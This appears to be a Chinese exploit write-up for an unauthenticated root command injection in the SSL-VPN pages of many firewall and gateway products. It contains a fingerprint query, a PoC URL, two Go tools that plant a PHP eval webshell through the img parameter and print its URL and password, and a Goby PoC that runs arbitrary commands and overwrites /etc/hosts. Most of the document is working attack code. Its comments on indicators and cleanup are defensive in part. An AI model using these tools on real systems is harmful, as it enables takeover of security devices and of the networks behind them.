多个防火墙产品RCE

多个防火墙产品RCE

影响产品（本页仅列出产品名称，未给出具体受影响版本）

H3C-下一代防火墙
安恒信息-明御安全网关
MAiPU-安全网关
D_Link-下一代防火墙
HUAWEI-公司产品
迈普通信技术股份有限公司安全网关
博达通信-下一代防火墙
任天行网络安全管理系统\安全审计系统
安博通应用网关
烽火网络安全审计
瑞斯康达科技发展股份有限公司安全路由器
任子行网络安全审计系统
绿盟安全审计系统
深圳市鑫塔科技有限公司第二代防火墙

FOFA 指纹（按登录页静态资源路径识别产品，命中并不等于存在漏洞，需进一步验证）

body="/webui/images/default/default/alert_close.jpg"

PoC（执行 whoami 并通过 tee 将结果写入目标 webroot 下的 /usr/local/webui/sslvpn/ceshi.txt；该 PoC 并非无痕，验证后需清理该文件，防守方也可将该文件作为排查线索）

/sslvpn/sslvpn_client.php?client=logoImg&img=%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt

利用脚本（虽名为"批量"，脚本实际只接受单个 -t 目标；成功后会在目标 /usr/local/webui/sslvpn/ 下留下随机文件名的 PHP 文件）

package main

import (
"crypto/tls"
"fmt"
"github.com/fatih/color"
"github.com/hpifu/go-kit/hflag"
"github.com/imroc/req/v3"
"github.com/thanhpk/randstr"
"net/http"
"strings"
"time"
)

// reqHeader is applied to every request so the probe resembles an ordinary
// desktop browser (Chrome 119 on macOS). Note that reqCli below selects a
// Safari TLS fingerprint while this header claims Chrome; a WAF or IDS that
// correlates JA3 with User-Agent could key on that mismatch.
var reqHeader = map[string]string{
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh-TW;q=0.9,zh;q=0.8",
"Connection": "close",
}

// main drops a one-line PHP file into the SSL-VPN webroot of a single target
// by abusing the unauthenticated command injection in the img parameter of
// /sslvpn/sslvpn_client.php, then prints the URL of that file.
//
// Only -t/--target is accepted; this is a single-target tool. The payload
// base64-decodes to `<?php eval($_REQUEST['c']);?>` and the file name is
// random, so the durable indicator for defenders is any unexpected .php under
// /usr/local/webui/sslvpn/. The file is never removed by this tool — clean it
// up after an authorized test.
func main() {
	hflag.AddFlag("target", "SSLVPN系统地址", hflag.Required(), hflag.Shorthand("t"))
	if parseErr := hflag.Parse(); parseErr != nil {
		fmt.Println(hflag.Usage())
		return
	}
	target := hflag.GetString("target")
	shellName := randstr.Hex(8) + ".php"

	// Everything after "/tmp|" in the img value is run as a shell command on
	// the appliance. The "//ss" -> "/ss" fixup tolerates a target given with
	// a trailing slash.
	payload := "/sslvpn/sslvpn_client.php?client=logoImg&img=/tmp|echo%20PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4=|base64%20-d|tee%20/usr/local/webui/sslvpn/" + shellName
	injectURL := strings.Replace(target+payload, "//ss", "/ss", 1)
	shellURL := strings.Replace(target+"/sslvpn/"+shellName, "//ss", "/ss", 1)

	resp, err := reqCli().R().Get(injectURL)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer func() { _ = resp.Body.Close() }()

	// Success is judged by the server reflecting the tail of our command in a
	// 200 body. This is a reflection heuristic, not proof that the file was
	// written: a page that merely echoes the parameter would look the same.
	vulnerable := resp.StatusCode == http.StatusOK &&
		strings.Contains(resp.String(), "|base64 -d|tee /usr/local/webui/sslvpn/")
	if !vulnerable {
		fmt.Println(color.GreenString("\n%s", "站点安全不存在漏洞"))
		return
	}
	fmt.Println(color.RedString("\nShell URL Is : %s\nShell Pass is : c\n", shellURL))
}

// reqCli builds the HTTP client used for the probe.
//
// Security-relevant choices, kept from the original tool:
//   - InsecureSkipVerify: appliances typically present self-signed
//     certificates, so verification is disabled. This also means anything
//     on the network path can impersonate the target and receive the payload.
//   - MinVersion TLS 1.0: allowed so that legacy management interfaces still
//     negotiate; raise to TLS 1.2 where the target supports it.
//   - Safari TLS fingerprint while reqHeader advertises Chrome: the two do
//     not match and can be correlated by a fingerprinting WAF.
//   - 10 s per-request timeout.
func reqCli() *req.Client {
	c := req.C()
	for name, value := range reqHeader {
		c.SetCommonHeader(name, value)
	}
	c.SetTimeout(10 * time.Second)
	c.SetTLSFingerprintSafari()
	c.SetAutoDecodeAllContentType()
	// Set last so it is not overwritten by the fingerprint helper.
	c.TLSClientConfig = &tls.Config{
		InsecureSkipVerify: true,
		MinVersion:         tls.VersionTLS10,
		MaxVersion:         tls.VersionTLS13,
	}
	return c
}
package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
)

// init registers Goby PoC 6807 ("Multiple Security Gateway Frontend RCE").
//
// What the embedded definition does (decoded from the URL-encoded img values):
//
//	ScanSteps:
//	  1. GET /sslvpn/sslvpn_client.php must answer 200.
//	  2. img = `6drcdfs34c1h /tmp || cp /etc/hosts /usr/local/webui/webui/images/basic/login/main_logo21.txt || ls`
//	     and the marker 6drcdfs34c1h must be reflected in the 200 body.
//	  3. GET /webui/images/basic/login/main_logo21.txt must answer 200 and
//	     contain "localhost", i.e. the copied /etc/hosts.
//	ExploitSteps: same shape, but
//	  img = `6drcdfs34c1h /tmp ||  <cmd> | tee /etc/hosts /usr/local/webui/webui/images/basic/login/main_logo21.txt || ls`
//	  and the .txt is fetched and returned as "output".
//
// NOTE(review): in the exploit step, tee receives /etc/hosts as its first
// file argument, so if the injection runs in a shell as the PoC assumes, every
// exploit run overwrites the appliance's /etc/hosts with the command output.
// That is destructive on a production device; tee only to the webroot file.
// NOTE(review): the marker annotated "random string" is a fixed constant
// (6drcdfs34c1h) in both the scan and exploit URIs, and main_logo21.txt is
// never removed from the webroot — both are usable as detection indicators.
// NOTE(review): "CVSSScore": "0.0" is a placeholder and does not reflect the
// unauthenticated root RCE described in "Impact".
func init() {
expJson := `{
"Name": "Multiple Security Gateway Frontend RCE",
"Description": "A 0day RCE in multiple security gateway",
"Product": "Multiple Security Gateway",
"Homepage": "https://gobies.org/",
"DisclosureDate": "2021-05-30",
"Author": "gobysec@gmail.com",
"GobyQuery": "header=\"Set-Cookie: USGSESSID\"",
"Level": "3",
"Impact": "<p>The attackers are allowed to execute any code with root privilege without any login crenditials.</p>",
"Recommendation": "<p>1. For security devices, it's not recommended to make them accessable from Internet.</p><p>2. You should contact the product suppliance for help.</p>",
"References": [
"https://gobies.org/"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "cat /etc/hosts ",
"show": "Enter the command you want to execute"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/sslvpn/sslvpn_client.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/sslvpn/sslvpn_client.php?client=logoImg&img=%36%64%72%63%64%66%73%33%34%63%31%68%20%2f%74%6d%70%20%7c%7c%20%63%70%20%2f%65%74%63%2f%68%6f%73%74%73%20%2f%75%73%72%2f%6c%6f%63%61%6c%2f%77%65%62%75%69%2f%77%65%62%75%69%2f%69%6d%61%67%65%73%2f%62%61%73%69%63%2f%6c%6f%67%69%6e%2f%6d%61%69%6e%5f%6c%6f%67%6f%32%31%2e%74%78%74%20%7c%7c%20%6c%73",
"follow_redirect": true,
"header": {
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "iframe",
"Referer": "{{{hostinfo}}}",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "6drcdfs34c1h",
"bz": "random string"
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/webui/images/basic/login/main_logo21.txt",
"follow_redirect": true,
"header": {
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "iframe",
"Referer": "{{{hostinfo}}}",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "localhost",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/sslvpn/sslvpn_client.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"set_variable": [
"cmdUrlEncoded|cmd|url_encode|{{{cmd}}}"
],
"uri": "/sslvpn/sslvpn_client.php?client=logoImg&img=%36%64%72%63%64%66%73%33%34%63%31%68%20%2f%74%6d%70%20%7c%7c%20%20{{{cmdUrlEncoded}}}%20%7c%20%74%65%65%20%2f%65%74%63%2f%68%6f%73%74%73%20%2f%75%73%72%2f%6c%6f%63%61%6c%2f%77%65%62%75%69%2f%77%65%62%75%69%2f%69%6d%61%67%65%73%2f%62%61%73%69%63%2f%6c%6f%67%69%6e%2f%6d%61%69%6e%5f%6c%6f%67%6f%32%31%2e%74%78%74%20%7c%7c%20%6c%73",
"follow_redirect": true,
"header": {
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "iframe",
"Referer": "{{{hostinfo}}}",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "6drcdfs34c1h",
"bz": "random string"
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/webui/images/basic/login/main_logo21.txt",
"follow_redirect": true,
"header": {
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "iframe",
"Referer": "{{{hostinfo}}}",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"RCE",
"0day"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"PocId": "6807"
}`

// Register with the Goby exploit manager; no custom scan/exploit callbacks
// (the two nil arguments), so the JSON steps above are the whole logic.
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}

另一个触发点（/sslvpn/sk403.php，client=logoImg&img= 参数与 sslvpn_client.php 相同；下方脚本仍为单目标，且同样会在目标 webroot 留下 PHP 文件）

package main

import (
"crypto/tls"
"fmt"
"github.com/fatih/color"
"github.com/hpifu/go-kit/hflag"
"github.com/imroc/req/v3"
"github.com/liushuochen/gotable"
"github.com/liushuochen/gotable/table"
"github.com/thanhpk/randstr"
"net/http"
"os"
"strings"
"time"
)

// main is the CLI entry point: parse -t/-p, run the single-target exploit,
// then print the wall-clock time the run took.
func main() {
	started := time.Now()
	target, proxy := getUserParams()
	exploit(target, proxy)
	elapsed := time.Since(started)
	fmt.Println(color.GreenString("Total Use Time : %s\n", elapsed.String()))
}
// httpReqClient returns a fresh *req.Client for one exploit attempt.
//
// Behaviour worth knowing before pointing this at anything:
//   - Certificate verification is off (InsecureSkipVerify) and TLS 1.0 is
//     still permitted, to reach appliances with self-signed or legacy TLS
//     stacks. Consequently any on-path party can impersonate the target.
//   - HTTP/1.1 is forced and redirects are not followed, so a 30x from the
//     device surfaces to the caller as a non-200 status rather than being
//     chased.
//   - The TLS fingerprint mimics Safari while the User-Agent claims Chrome on
//     macOS; a WAF/IDS correlating the two could key on that mismatch.
//   - 15 s timeout per request.
func httpReqClient() *req.Client {
	const (
		userAgent      = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
		acceptTypes    = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
		acceptEncoding = "gzip, deflate, br"
		acceptLanguage = "zh-CN,zh-TW;q=0.9,zh;q=0.8"
	)
	c := req.C()
	c.SetCommonHeader("User-Agent", userAgent)
	c.SetCommonHeader("Accept", acceptTypes)
	c.SetCommonHeader("Accept-Encoding", acceptEncoding)
	c.SetCommonHeader("Accept-Language", acceptLanguage)
	c.SetCommonHeader("Connection", "close")
	c.EnableForceHTTP1()
	c.SetTLSFingerprintSafari()
	c.SetTimeout(15 * time.Second)
	c.SetRedirectPolicy(req.NoRedirectPolicy())
	c.SetAutoDecodeAllContentType()
	// Set last so the fingerprint helper cannot override it.
	c.TLSClientConfig = &tls.Config{
		InsecureSkipVerify: true,
		MinVersion:         tls.VersionTLS10,
		MaxVersion:         tls.VersionTLS13,
	}
	return c
}

// getUserParams registers and parses the command-line flags.
//
// -t/--target (required) is the target address; -p/--proxy is an optional
// proxy URL. On a parse error the usage text is printed in red and the
// process exits with status 1, so callers never receive an error value.
func getUserParams() (host, proxyAddr string) {
	hflag.AddFlag("target", "目标地址", hflag.Required(), hflag.Shorthand("t"))
	hflag.AddFlag("proxy", "代理地址", hflag.Shorthand("p"))
	if parseErr := hflag.Parse(); parseErr != nil {
		fmt.Println(color.RedString("%s", hflag.Usage()))
		os.Exit(1)
	}
	host = hflag.GetString("target")
	proxyAddr = hflag.GetString("proxy")
	return host, proxyAddr
}

// randFile returns a short random hex basename (randstr.Hex(8)) so each run
// drops a differently named file whose path cannot be guessed from the tool.
func randFile() string {
	return randstr.Hex(8)
}
// fmtTable creates the three-column result table (tool, shell URL, password).
//
// The error from gotable.Create is deliberately discarded, as in the original:
// with constant column names it is not expected to fail, but if it did the
// returned nil table would panic in the caller's AddRow.
func fmtTable() *table.Table {
	columns := []string{
		color.GreenString("%s", "Shell连接工具"),
		color.RedString("%s", "Shell连接地址"),
		color.BlueString("%s", "Shell连接密码"),
	}
	tab, _ := gotable.Create(columns...)
	return tab
}

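// exploit fires the command injection at a single host via /sslvpn/sk403.php
// (an alternative entry point taking the same client=logoImg&img= parameters
// as sslvpn_client.php), writes a one-line PHP eval shell into the SSL-VPN
// webroot and prints how to reach it.
//
// t is the target origin (scheme://host[:port], trailing slash tolerated) and
// p an optional proxy URL. The payload base64-decodes to
// `<?php eval($_REQUEST['c']);?>`; the file name is random, so the durable
// indicator for defenders is any unexpected .php under
// /usr/local/webui/sslvpn/. The tool never removes the file — clean up after
// an authorized test.
//
// Fixes over the original: a transport error now returns instead of falling
// through to a nil *Response (which panicked in the deferred Body.Close and
// at StatusCode), and a 200 response that lacks the marker now reports
// "not vulnerable" instead of printing nothing at all.
func exploit(t, p string) {
	filename := randFile() + ".php"
	vulPath := "/sslvpn/sk403.php?client=logoImg&img=/tmp|echo%20PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4=|base64%20-d|tee%20/usr/local/webui/sslvpn/" + filename
	// "//ss" -> "/ss" collapses the double slash produced when the target is
	// given with a trailing "/".
	fullURL := strings.Replace(t+vulPath, "//ss", "/ss", 1)
	shellURL := strings.Replace(t+"/sslvpn/"+filename, "//ss", "/ss", 1)

	client := httpReqClient()
	if p != "" {
		client.SetProxyURL(p)
	}
	resp, err := client.R().Get(fullURL)
	if err != nil {
		// No response object exists on this path; touching it would panic.
		fmt.Println(err)
		return
	}
	defer func() {
		_ = resp.Body.Close()
	}()

	// Success is judged by the server reflecting the tee destination from our
	// img value in a 200 body. This is a reflection heuristic, not proof that
	// the file was written; a page that merely echoes the parameter would
	// look identical.
	if resp.StatusCode == http.StatusOK && strings.Contains(resp.String(), "/usr/local/webui/sslvpn/") {
		tab := fmtTable()
		_ = tab.AddRow([]string{"AntSword", shellURL, "c"})
		fmt.Println(tab)
		return
	}
	fmt.Println(color.RedString("%s", "站点不存在漏洞,安全的很"))
}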